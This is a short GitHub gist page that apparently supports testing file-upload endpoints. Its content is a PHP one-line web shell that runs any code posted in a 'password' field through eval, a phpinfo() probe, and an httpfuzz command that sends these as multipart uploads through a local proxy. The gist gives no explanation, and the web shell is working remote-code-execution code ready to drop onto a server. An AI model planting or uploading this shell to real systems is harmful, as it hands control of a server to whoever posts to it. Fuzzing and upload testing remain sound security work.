Skip to content

Instantly share code, notes, and snippets.

@JonCooperWorks
Last active September 26, 2020 02:46
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Embed
What would you like to do?
<?php @eval($_POST['password']);?>
<?php echo phpinfo(); ?>
httpfuzz \
--seed-request uploadPOST.request \
--delay-ms 50 \
--proxy-url http://localhost:8080 \
--multipart-file-name uploaded \
--payload-dir ./payloads
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment